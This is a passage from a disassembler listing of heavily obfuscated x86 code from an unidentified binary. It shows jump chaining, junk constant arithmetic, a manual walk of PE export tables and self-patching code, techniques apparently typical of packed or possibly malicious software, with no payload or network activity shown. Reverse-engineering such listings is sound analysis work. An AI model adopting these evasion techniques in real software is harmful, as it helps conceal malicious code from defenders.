; FUNCTION CHUNK AT 00459BF7 SIZE 00000006 BYTES

		pop	ebp
		mov	eax, ds:dword_446BAC
		or	eax, eax
		jnz	loc_43DBED
		jmp	loc_44C1A8
sub_4465C3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AAA1

loc_4465D7:				; CODE XREF: sub_44AAA1-CA6Aj
		xchg	eax, [esp+0Ch+var_C]
		mov	edi, eax
		pop	eax
		or	edi, 21BC5BCDh
		test	edi, 200000h
		jmp	loc_451664
; END OF FUNCTION CHUNK	FOR sub_44AAA1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_182. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4465EF:				; CODE XREF: y2kk37jd:00452E95j
		jmp	loc_43F52A
; ---------------------------------------------------------------------------

loc_4465F4:				; DATA XREF: sub_44001E+B8FCo
		push	1
		push	offset loc_43C807
		jmp	loc_44E5E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_446600:				; CODE XREF: sub_4507BF:loc_43B2A0j
		cmp	esi, eax
		jmp	loc_45BF16
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
		db 0FFh
dword_446608	dd 0			; DATA XREF: sub_43D4CE+Aw
					; y2kk37jd:loc_44A5AAw	...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444A65

loc_44660C:				; CODE XREF: sub_444A65+AC23j
		jmp	loc_44CF22
; END OF FUNCTION CHUNK	FOR sub_444A65
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FEFB

loc_446611:				; CODE XREF: sub_43FEFB+1Ej
		jmp	loc_448E0C
; END OF FUNCTION CHUNK	FOR sub_43FEFB
; ---------------------------------------------------------------------------
		dw 1716h
dword_446618	dd 0E7A5FD77h		; DATA XREF: sub_43B4EE:loc_43EC5Br
					; y2kk37jd:00453442w
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44661C:				; CODE XREF: sub_445226+14DAAj
		jmp	loc_43D44F
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		db 54h,	74h, 0F5h
dword_446624	dd 0			; DATA XREF: sub_44A6B5:loc_447970w
					; sub_44A6B5+3r
dword_446628	dd 77D40000h		; DATA XREF: sub_43C054-B95r
					; sub_43C054:loc_446DBAw ...
; ---------------------------------------------------------------------------

loc_44662C:				; DATA XREF: sub_43C054:loc_450E73o
					; sub_44723A+12793o
		pop	ebp
		fcom	qword ptr [esi-37h]
		int	3		; Trap to Debugger
		and	ecx, [ebx+8DD832h]
; START	OF FUNCTION CHUNK FOR sub_457F40

loc_446637:				; CODE XREF: sub_457F40+3j
		jmp	nullsub_451
; END OF FUNCTION CHUNK	FOR sub_457F40
; ---------------------------------------------------------------------------
dword_44663C	dd 0F0h			; DATA XREF: y2kk37jd:00444EABr
					; sub_44B949+4w ...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459158

loc_446640:				; CODE XREF: sub_459158+Bj
		jmp	loc_43EB5C
; END OF FUNCTION CHUNK	FOR sub_459158
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A3A8

loc_446645:				; CODE XREF: sub_45A3A8-6DACj
		jmp	loc_45BAF0
; END OF FUNCTION CHUNK	FOR sub_45A3A8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_44664A:				; CODE XREF: sub_43F8B8+4BEDj
		jmp	loc_45A74B
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------
		db 0F9h
dword_446650	dd 77Ch			; DATA XREF: sub_4434CD+4w
					; y2kk37jd:00450E3Fr
; ---------------------------------------------------------------------------

loc_446654:				; CODE XREF: y2kk37jd:0045C34Ej
		jmp	loc_44778D
; ---------------------------------------------------------------------------
		db 99h,	0FCh, 4
dword_44665C	dd 762777D4h		; DATA XREF: sub_43F2F2+34A4r
					; sub_451A53:loc_45B563w
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_446660:				; CODE XREF: sub_44B814+402Aj
		jmp	loc_450A31
; END OF FUNCTION CHUNK	FOR sub_44B814
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45ADEC

loc_446665:				; CODE XREF: sub_45ADEC-D556j
		jmp	loc_4463F2
; END OF FUNCTION CHUNK	FOR sub_45ADEC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451A35

loc_44666A:				; CODE XREF: sub_451A35:loc_4461FCj
		or	edx, edx
		jnz	loc_452D01
		jmp	loc_43BD86
; END OF FUNCTION CHUNK	FOR sub_451A35
; ---------------------------------------------------------------------------

locret_446677:				; CODE XREF: y2kk37jd:00456A1Dj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447977

loc_446678:				; CODE XREF: sub_447977+17j
		add	ecx, 5175A4DEh
; END OF FUNCTION CHUNK	FOR sub_447977

; =============== S U B	R O U T	I N E =======================================



sub_44667E	proc near		; CODE XREF: sub_43B2FDp
		xchg	esi, [esp+0]
		pop	esi
		call	sub_44B86B
		jmp	ds:off_41E140
sub_44667E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447EA

loc_44668D:				; CODE XREF: sub_4447EA+Cj
		jmp	loc_450E9E
; END OF FUNCTION CHUNK	FOR sub_4447EA
; ---------------------------------------------------------------------------

loc_446692:				; CODE XREF: y2kk37jd:loc_44BA8Fj
		jge	loc_44C0DE
		push	eax
		xor	edi, ebx
		jp	sub_450FE4
		jmp	loc_44C0D8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_4466A6:				; CODE XREF: sub_44113A+482Dj
		xor	eax, edi
		popf
		test	edx, esi
		jmp	loc_449FDA
; END OF FUNCTION CHUNK	FOR sub_44113A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_391. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F930

loc_4466B1:				; CODE XREF: sub_44F930+3FEDj
		jmp	sub_447832
; END OF FUNCTION CHUNK	FOR sub_44F930
; ---------------------------------------------------------------------------

loc_4466B6:				; CODE XREF: y2kk37jd:0043CF8Bj
		add	eax, 828F33FEh
		and	eax, ds:4000ECh
		add	eax, 9B8D5660h
		add	eax, ebp
		add	eax, 54F2A97Ah
		jmp	loc_454B5B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_4466D5:				; CODE XREF: sub_43C851+D465j
		cmp	eax, 0F01C1F2Bh
		jmp	loc_44E72B
; END OF FUNCTION CHUNK	FOR sub_43C851

; =============== S U B	R O U T	I N E =======================================



sub_4466E0	proc near		; CODE XREF: y2kk37jd:00448A3Ej
					; sub_45A089+2p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00444D0C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004462F4 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044C560 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044D742 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E926 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044F04F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457547 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458B44 SIZE 0000000B BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	edi
		mov	edi, ecx
		xchg	edi, [esp+0]
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_4516C8
		jmp	loc_44F04F
sub_4466E0	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4466F8	proc near		; DATA XREF: sub_442049+5o
		xchg	ebx, [esp+0]
		jmp	sub_440CD1
sub_4466F8	endp

; ---------------------------------------------------------------------------

loc_446700:				; DATA XREF: sub_44635E+3o
		js	loc_448A23
		add	esp, 0FFFFFED0h
		mov	[ebp-0Ch], ecx
		mov	[ebp-6], dx
		jmp	loc_43C791

; =============== S U B	R O U T	I N E =======================================



sub_446718	proc near		; CODE XREF: sub_44BD20-DB93p
					; y2kk37jd:0045209Cj

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00440CCC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044199A SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004437F2 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004448F6 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00447AF4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F37C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450FB2 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004510D1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452C35 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00454105 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045549E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456EEA SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045959D SIZE 0000000F BYTES

		xchg	edx, [esp+4+var_4]
		pop	edx
		xchg	ecx, [esp+0]
		call	sub_44461D
		push	30D93949h
		xchg	ebp, [esp+4+var_4]
		jmp	loc_44F37C
sub_446718	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		test	ebx, 0E131818Dh
		jmp	loc_45AC28
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F67B

loc_44673C:				; CODE XREF: sub_43F67B+Ej
		pop	ecx
		rol	ecx, 4
		add	ecx, 67BE75CCh
		and	ecx, 0D9660427h
		or	ecx, 0F65EA1C2h
		jmp	loc_4460CB
; END OF FUNCTION CHUNK	FOR sub_43F67B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_446757:				; CODE XREF: sub_44B814+9D18j
		jnz	loc_44D404

loc_44675D:				; CODE XREF: sub_43EF4F+1D61Aj
		jmp	nullsub_333
; END OF FUNCTION CHUNK	FOR sub_44B814
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_446762:				; CODE XREF: sub_4458DD+11351j
		jmp	loc_44F20A
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
		sub	edi, 99CC03A6h
		sbb	ebx, 0CA1006F8h
		jmp	loc_44D3F5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_446778:				; CODE XREF: sub_4411C3+BB4Bj
		jz	loc_4424F4
		jmp	loc_4578D3
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_446783:				; CODE XREF: sub_44AC89-B81Cj
		xor	edx, 80009621h
		test	eax, edx
		pop	edx
		jz	loc_459829
		jmp	loc_45A5E5
; END OF FUNCTION CHUNK	FOR sub_44AC89
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_460. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C79E

loc_446798:				; CODE XREF: sub_44C79E+9063j
		jmp	nullsub_471
; END OF FUNCTION CHUNK	FOR sub_44C79E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4480CB

loc_44679D:				; CODE XREF: sub_4480CB+8j
		mov	esi, edx
		xchg	esi, [esp+4+var_4]
		nop
		push	57D9A3B7h
		pop	eax
		jmp	loc_441C1D
; END OF FUNCTION CHUNK	FOR sub_4480CB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A36

loc_4467AE:				; CODE XREF: sub_456A36:loc_446BD4j
		call	sub_45AAD1
; END OF FUNCTION CHUNK	FOR sub_456A36
; START	OF FUNCTION CHUNK FOR sub_454539

loc_4467B3:				; CODE XREF: sub_454539-FE7Bj
		push	0D4A632F7h
		pop	eax
		and	eax, 0BA389C68h
		js	loc_4571DC
; END OF FUNCTION CHUNK	FOR sub_454539
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_4467C5:				; CODE XREF: sub_43BD0D+A3A8j
		jmp	loc_43DF2B
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------
		adc	edx, eax
		jmp	loc_44837C
; ---------------------------------------------------------------------------
		not	ecx
		jmp	sub_43C7BF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BF88

loc_4467D8:				; CODE XREF: sub_43BF88:loc_44A865j
		add	eax, 60186B73h
		xor	eax, 0D46575C9h
		push	offset sub_44C2CD
		jmp	nullsub_488
; END OF FUNCTION CHUNK	FOR sub_43BF88
; ---------------------------------------------------------------------------
		push	ebx
		push	0DF0BBBCAh
		pop	ebx
		or	ebx, 0DFEAE181h
		add	ebx, 2BF39235h
		xor	ebx, 55433884h
		jmp	loc_45889B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C865

loc_44680C:				; CODE XREF: sub_43C865+B933j
					; y2kk37jd:00448D3Dj ...
		pop	ecx
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_43C865
; ---------------------------------------------------------------------------

loc_44680F:				; CODE XREF: y2kk37jd:0044864Dj
		jmp	sub_43F618
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453B0B

loc_446814:				; CODE XREF: sub_453B0B-17913j
		jmp	loc_44D147
; END OF FUNCTION CHUNK	FOR sub_453B0B

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_446819	proc near		; CODE XREF: sub_43B1D6+2p
					; y2kk37jd:0043C802j ...
		push	ebp
		mov	ebp, esp
		call	sub_453969

loc_446821:				; CODE XREF: sub_43E07B+FBB2j
		jmp	nullsub_47
sub_446819	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4429DD

loc_446826:				; CODE XREF: sub_4429DD-702Aj
		jmp	loc_442943
; END OF FUNCTION CHUNK	FOR sub_4429DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44107E

loc_44682B:				; CODE XREF: sub_44107E+16DA2j
		jle	loc_4440F5

loc_446831:				; CODE XREF: sub_44107E:loc_444500j
		call	sub_453B38

loc_446836:				; CODE XREF: sub_443AFD:loc_450C94j
		jnz	loc_44538A
; END OF FUNCTION CHUNK	FOR sub_44107E
; START	OF FUNCTION CHUNK FOR sub_440472

loc_44683C:				; CODE XREF: sub_440472+Cj
		jmp	nullsub_10
; END OF FUNCTION CHUNK	FOR sub_440472
; ---------------------------------------------------------------------------
		rol	edi, 3
		jmp	loc_445380
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C01A

loc_446849:				; CODE XREF: sub_45C01A:loc_45A33Dj
		pop	eax
		and	eax, 0D5151652h
		test	eax, 10000h
		jmp	loc_4424C5
; END OF FUNCTION CHUNK	FOR sub_45C01A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_73. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_44685C:				; CODE XREF: sub_43C851+228Bj
		jmp	loc_445EB1
; END OF FUNCTION CHUNK	FOR sub_43C851

; =============== S U B	R O U T	I N E =======================================



sub_446861	proc near		; DATA XREF: sub_43F346+1B1Ao

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B411 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043B695 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440EB4 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00442C71 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004449EF SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044C312 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044E40E SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044F32A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456AC0 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00457490 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0045819F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00458766 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A502 SIZE 00000005 BYTES

		xor	edx, edx
		push	edx
		call	sub_4421DC

loc_446869:				; CODE XREF: sub_43C851+142BAj
		jmp	loc_44E40E
sub_446861	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44686E	proc near		; DATA XREF: sub_44B233+4o
		xchg	edi, [esp+0]
		mov	edx, eax
		call	sub_4581BB
sub_44686E	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_446878:				; CODE XREF: sub_4411C3+15525j
		call	sub_43BA66
		or	eax, eax
		jnz	loc_45480A
		jmp	loc_4431C8
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441856

loc_44688A:				; CODE XREF: sub_441856:loc_459BAFj
		mov	eax, [ebp+var_4]
		call	sub_444D6F

loc_446892:				; CODE XREF: y2kk37jd:00452363j
		jmp	loc_43BA44
; END OF FUNCTION CHUNK	FOR sub_441856
; ---------------------------------------------------------------------------

loc_446897:				; CODE XREF: y2kk37jd:00451BBEj
		jmp	locret_43E632
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_44689C:				; CODE XREF: sub_44AC89+D9BCj
		jnz	loc_43B8AE
		add	eax, edi
		pop	edx
		jmp	loc_447ABD
; END OF FUNCTION CHUNK	FOR sub_44AC89
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4599BE

loc_4468AA:				; CODE XREF: sub_4599BE-B183j
		js	loc_453E70
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jmp	loc_440ED6
; END OF FUNCTION CHUNK	FOR sub_4599BE

; =============== S U B	R O U T	I N E =======================================



sub_4468BE	proc near		; CODE XREF: y2kk37jd:0044DE07p
					; y2kk37jd:0045A3C5j

; FUNCTION CHUNK AT 004552AA SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		lea	eax, nullsub_508
		mov	byte ptr [eax],	0C3h
		jmp	loc_4552AA
sub_4468BE	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4468D0	proc near		; CODE XREF: sub_4057E9+2Bp
					; sub_4468D0+5j
					; DATA XREF: ...
		call	sub_4468E0
		jmp	ds:off_41E174
sub_4468D0	endp

; ---------------------------------------------------------------------------

loc_4468DB:				; CODE XREF: y2kk37jd:004574ECj
		jmp	loc_45B8A8

; =============== S U B	R O U T	I N E =======================================



sub_4468E0	proc near		; CODE XREF: sub_4468E0:loc_43D02Dj
					; sub_4468D0p ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043BF01 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043D02D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444C36 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044602B SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044E8D3 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00453667 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 004581FE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A561 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045BDA2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045C1BA SIZE 00000005 BYTES

		jo	loc_45366F
		xchg	eax, [esp+0]
		jmp	loc_44602B
sub_4468E0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jg	loc_447074
		jmp	sub_4486E1
; ---------------------------------------------------------------------------

loc_4468F9:				; CODE XREF: y2kk37jd:loc_449DDAj
		push	ecx
; START	OF FUNCTION CHUNK FOR sub_43E049

loc_4468FA:				; CODE XREF: sub_43E049:loc_44224Fj
		push	0EC62B380h
		pop	ecx
		and	ecx, 7BB66B7h
		cmp	ecx, 82A0BB1h
		jmp	loc_442C32
; END OF FUNCTION CHUNK	FOR sub_43E049
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CDD5

loc_446911:				; CODE XREF: sub_44CDD5:loc_453A87j
		jnz	loc_43DC8F
		jmp	loc_43C40F
; END OF FUNCTION CHUNK	FOR sub_44CDD5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DCA

loc_44691C:				; CODE XREF: sub_448DCA-963Fj
					; sub_4507BF:loc_454842j
		cmp	dword ptr [ebp-108h], 6C436E6Fh
		jnz	loc_44C72F

loc_44692C:				; CODE XREF: y2kk37jd:loc_442197j
		jmp	loc_45408D
; END OF FUNCTION CHUNK	FOR sub_448DCA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440EC8

loc_446931:				; CODE XREF: sub_440EC8+192CBj
		add	ebx, 0C38A6249h
		xchg	ebx, [esp+14h+var_14]
		jmp	sub_456541
; END OF FUNCTION CHUNK	FOR sub_440EC8
; ---------------------------------------------------------------------------
		push	edx
		jmp	sub_453AF7
; ---------------------------------------------------------------------------

loc_446945:				; DATA XREF: sub_457FDC-AC64o
		rol	eax, 1Ch
		sub	eax, 619760EFh
		push	edx
		push	3907D96Fh
		pop	edx
		and	edx, 0D660019h

loc_44695B:				; CODE XREF: y2kk37jd:loc_43F92Bj
		add	edx, 999F1D92h
		jmp	loc_44CD6D
; ---------------------------------------------------------------------------

loc_446966:				; CODE XREF: y2kk37jd:0043B54Cj
		jl	loc_447709
		cmp	esi, 39880C97h
		jmp	loc_451945
; ---------------------------------------------------------------------------

loc_446977:				; CODE XREF: y2kk37jd:loc_442A7Fj
		mov	ds:dword_41E0FC, eax
		lea	eax, nullsub_394
		push	offset sub_44907A
		jmp	loc_45812B
; ---------------------------------------------------------------------------

loc_44698D:				; CODE XREF: y2kk37jd:00441037j
		push	6891D6C1h
		jo	loc_44E5EB
		jns	loc_447AA6
; START	OF FUNCTION CHUNK FOR sub_43E679

loc_44699E:				; CODE XREF: sub_43E679:loc_4495B7j
		xor	edi, 64BBAEC6h
		jmp	loc_455003
; END OF FUNCTION CHUNK	FOR sub_43E679
; ---------------------------------------------------------------------------
		mov	eax, esi
		popf
		jmp	sub_445FFF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_143. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4469B2:				; CODE XREF: y2kk37jd:0044ACA9j
		and	ecx, 6BACB221h
		sub	ecx, 60378AE5h
		test	ecx, 1000000h
		jmp	loc_43CDF0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CDD5

loc_4469C9:				; CODE XREF: sub_44CDD5-D2B2j
		and	ebx, 80A88035h
		not	ebp
		ror	edx, 17h

loc_4469D4:				; CODE XREF: sub_44CDD5:loc_44B895j
		push	0B614008Ch
		jmp	loc_44C6FE
; END OF FUNCTION CHUNK	FOR sub_44CDD5
; ---------------------------------------------------------------------------

loc_4469DE:				; CODE XREF: y2kk37jd:00440826j
		or	esi, 0AF47586h
; START	OF FUNCTION CHUNK FOR sub_43B765

loc_4469E4:				; CODE XREF: sub_43B765:loc_44080Aj
		rol	eax, 18h
		add	eax, 77D34CEAh
		or	ebx, eax
		push	offset loc_43C6CB
		jmp	loc_440C0F
; END OF FUNCTION CHUNK	FOR sub_43B765
; ---------------------------------------------------------------------------

loc_4469F9:				; CODE XREF: y2kk37jd:0043CFABj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E8DA

loc_4469FA:				; CODE XREF: sub_43E8DA+11j
		pop	esi
		rol	esi, 16h
		xor	esi, 0CE3D5B34h
		add	esi, 0E5559E9Eh
		jmp	loc_456D50
; END OF FUNCTION CHUNK	FOR sub_43E8DA
; ---------------------------------------------------------------------------

loc_446A0F:				; DATA XREF: sub_43B9FA+95CDo
		mov	eax, [eax+0Ch]
; START	OF FUNCTION CHUNK FOR sub_448A12

loc_446A12:				; CODE XREF: sub_448A12:loc_454FA9j
					; sub_45024B:loc_45A015j
		js	loc_454472
		mov	ebx, [eax+18h]
		mov	ecx, [ebx+3Ch]
		mov	ecx, [ebx+ecx+78h]
		push	offset loc_448DAC
		jmp	loc_445B1C
; END OF FUNCTION CHUNK	FOR sub_448A12
; ---------------------------------------------------------------------------

loc_446A2C:				; CODE XREF: y2kk37jd:0045A53Dj
		or	ebp, edi
; START	OF FUNCTION CHUNK FOR sub_44C304

loc_446A2E:				; CODE XREF: sub_44C304:loc_45A525j
		add	ebx, (offset loc_487E58+3)
		mov	[ebx], eax
		pop	ebx
		retn
; END OF FUNCTION CHUNK	FOR sub_44C304
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457689

loc_446A38:				; CODE XREF: sub_457689+Dj
		jmp	loc_449ED3
; END OF FUNCTION CHUNK	FOR sub_457689
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4492F7

loc_446A3D:				; CODE XREF: sub_4492F7+9588j
		jmp	loc_444DE4
; END OF FUNCTION CHUNK	FOR sub_4492F7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458FC0

loc_446A42:				; CODE XREF: y2kk37jd:0044F626j
					; sub_458FC0-7B2j
		rol	eax, 16h
		push	eax
		retn
; END OF FUNCTION CHUNK	FOR sub_458FC0
; ---------------------------------------------------------------------------

loc_446A47:				; CODE XREF: y2kk37jd:00454BD9j
		jmp	sub_442C3E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A33C

loc_446A4C:				; CODE XREF: sub_44A33C:loc_441006j
		jmp	loc_43C787
; END OF FUNCTION CHUNK	FOR sub_44A33C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_446A51:				; CODE XREF: sub_4507BF-10571j
		test	eax, esi
		jmp	loc_43C958
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_446A58:				; CODE XREF: sub_43F346+4A33j
		jl	loc_4551DC
		xchg	ebx, [ebp+0]

loc_446A61:				; CODE XREF: sub_43F346:loc_45942Fj
		push	518DC291h
		xchg	ebp, [esp+0]
		mov	eax, ebp
		pop	ebp
		jmp	loc_451E95
; END OF FUNCTION CHUNK	FOR sub_43F346
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4490B4

loc_446A71:				; CODE XREF: sub_4490B4+11j
		jnz	loc_43F98B
		jmp	loc_44E7F2
; END OF FUNCTION CHUNK	FOR sub_4490B4
; ---------------------------------------------------------------------------
		retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_173. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_446A7E:				; CODE XREF: sub_453867-7E9Fj
		call	sub_4577FE
		test	al, al
		jmp	loc_442FD9
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_446A8A:				; CODE XREF: sub_43ED19+1D5ACj
		sub	ebx, 892DF284h
		test	ebx, 800000h
		jmp	loc_443CA8
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448573

loc_446A9B:				; CODE XREF: sub_448573:loc_45C235j
		call	sub_451E9F
; END OF FUNCTION CHUNK	FOR sub_448573
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_446AA0:				; CODE XREF: sub_43F346+CE7Dj
		jmp	loc_45492C
; END OF FUNCTION CHUNK	FOR sub_43F346
; ---------------------------------------------------------------------------

loc_446AA5:				; CODE XREF: y2kk37jd:0044971Dj
		jmp	loc_44197D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45ADEC

loc_446AAA:				; CODE XREF: sub_45ADEC:loc_45C23Fj
		jnz	loc_447F0D
		jmp	loc_44EBE3
; END OF FUNCTION CHUNK	FOR sub_45ADEC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4577FE

loc_446AB5:				; CODE XREF: sub_4577FE+229Cj
		cmp	esi, 38232D7Dh
		jmp	loc_4420BA
; END OF FUNCTION CHUNK	FOR sub_4577FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450D61

loc_446AC0:				; CODE XREF: sub_450D61+5j
		jmp	ds:off_41E0D0
; END OF FUNCTION CHUNK	FOR sub_450D61

; =============== S U B	R O U T	I N E =======================================



sub_446AC6	proc near		; CODE XREF: sub_45B7AA:loc_44B8ABj
					; sub_450D61p ...

; FUNCTION CHUNK AT 00448005 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00449141 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044AF13 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F96A SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		mov	edx, ecx
		call	sub_450203

loc_446AD0:				; CODE XREF: sub_442DDC+4B65j
		jmp	loc_44AF13
sub_446AC6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		sub	eax, ebp
		jmp	sub_448F60
; ---------------------------------------------------------------------------
